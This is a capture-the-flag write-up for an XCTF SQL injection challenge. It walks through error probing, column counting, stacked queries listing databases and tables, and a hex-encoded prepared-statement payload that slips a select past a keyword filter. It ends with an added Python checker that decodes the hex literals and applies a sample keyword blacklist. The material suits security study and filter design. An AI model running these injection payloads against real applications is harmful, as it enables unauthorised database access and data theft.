xctf:https://adworld.xctf.org.cn/
Entering a single quote produces an error.
Returns normally:
/?inject=1' and 1=1--+
Error:
/?inject=1' and 1=2--+
order by 3 errors while order by 2 is normal, so the query returns two columns:
?inject=1' order by 2--+
Trying select shows that a regular-expression filter rejects it, along with several other keywords.
Stacked queries still work, though, so the databases can be listed:
?inject=1';show databases;--+
List the tables in the current database:
/?inject=1';show tables;--+
Check the columns of the words table; there is no flag column:
/?inject=111';show columns from words;--+
Looking at the columns of the table 1919810931114514 next, it cannot be viewed directly with show.
The reason:
- Table or column names that collide with MySQL keywords or reserved words must be quoted with backticks
- A purely numeric table name must also be quoted with backticks
So we add backticks to view the purely numeric table, and find the flag column:
/?inject=111';show columns from `1919810931114514`;--+
Approach for querying the flag:
We cannot use select directly to read the flag, but we can use what is called a dynamic query (a prepared statement). A dynamic query still needs a select statement, but the SQL text can be written as a hexadecimal literal, which MySQL automatically converts back to a string; we store it in a user variable, prepare a statement from it, and then execute it.
If you are not familiar with dynamic query statements, the following references cover their usage:
MYSQL dynamic query result
mysql implements mssql exec dynamic query statement
We convert the SQL statement into hexadecimal and use it in the payload:
/?inject=1';SeT@sql=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @sql;execute execsql;#
- set @sql: store the (hex-encoded) statement in a user variable
- prepare: build the prepared statement execsql from that variable
- execute: run the prepared statement
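To show why a keyword filter on the raw parameter misses this payload, here is an added Python example (not part of the original write-up) that inspects the inject parameter the way a filter would, before and after decoding MySQL 0x hex literals; the blocked-word list and the sample requests are constructed assumptions, not the challenge's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample requests (the third is the write-up's final payload)
SAMPLE_REQUESTS = [
    "/?inject=1",
    "/?inject=1' order by 2--+",
    "/?inject=1';SeT@sql=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @sql;execute execsql;#",
]

# MySQL hex string literal such as 0x73656c656374 (must not be preceded by a word character)
HEX_LITERAL = re.compile(r"(?<![0-9a-zA-Z])0x([0-9a-fA-F]+)")
# Illustrative keyword blacklist; the challenge's real list is not reproduced in the write-up
BLOCKED_WORDS = ("select", "update", "delete", "drop", "insert")

def get_inject_param(path):
    """Pull the raw inject= value out of a request path without treating ';' or '#' specially."""
    query = path.split("?", 1)[1] if "?" in path else ""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "inject":
            return unquote_plus(value)
    return ""

def decode_hex_literals(text):
    """Return the printable ASCII strings hidden inside 0x... literals (MySQL converts them the same way)."""
    out = []
    for m in HEX_LITERAL.finditer(text):
        digits = m.group(1)
        if len(digits) % 2:
            continue  # odd digit count: MySQL reads this as a number, not a string
        raw = bytes.fromhex(digits)
        if all(32 <= b < 127 for b in raw):
            out.append(raw.decode("ascii"))
    return out

def analyze_request(path):
    """Apply the blacklist to the raw value and again to the decoded hex literals."""
    value = get_inject_param(path)
    lowered = value.lower()
    statements = [s for s in lowered.split(";") if s.strip()]
    decoded = decode_hex_literals(value)
    return {
        "stacked": len(statements) > 1,                     # more than one statement after the injection point
        "prepare_execute": "prepare " in lowered and "execute " in lowered,
        "decoded_literals": decoded,
        "raw_keyword_hits": [w for w in BLOCKED_WORDS if w in lowered],
        "decoded_keyword_hits": sorted({w for d in decoded for w in BLOCKED_WORDS if w in d.lower()}),
    }

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req, "->", analyze_request(req))
```

The final payload has no blacklisted word in its raw form, yet the decoded literal is exactly `select * from \`1919810931114514\``, which is why a filter needs to decode hex literals and reject stacked or prepared statements rather than match keywords alone.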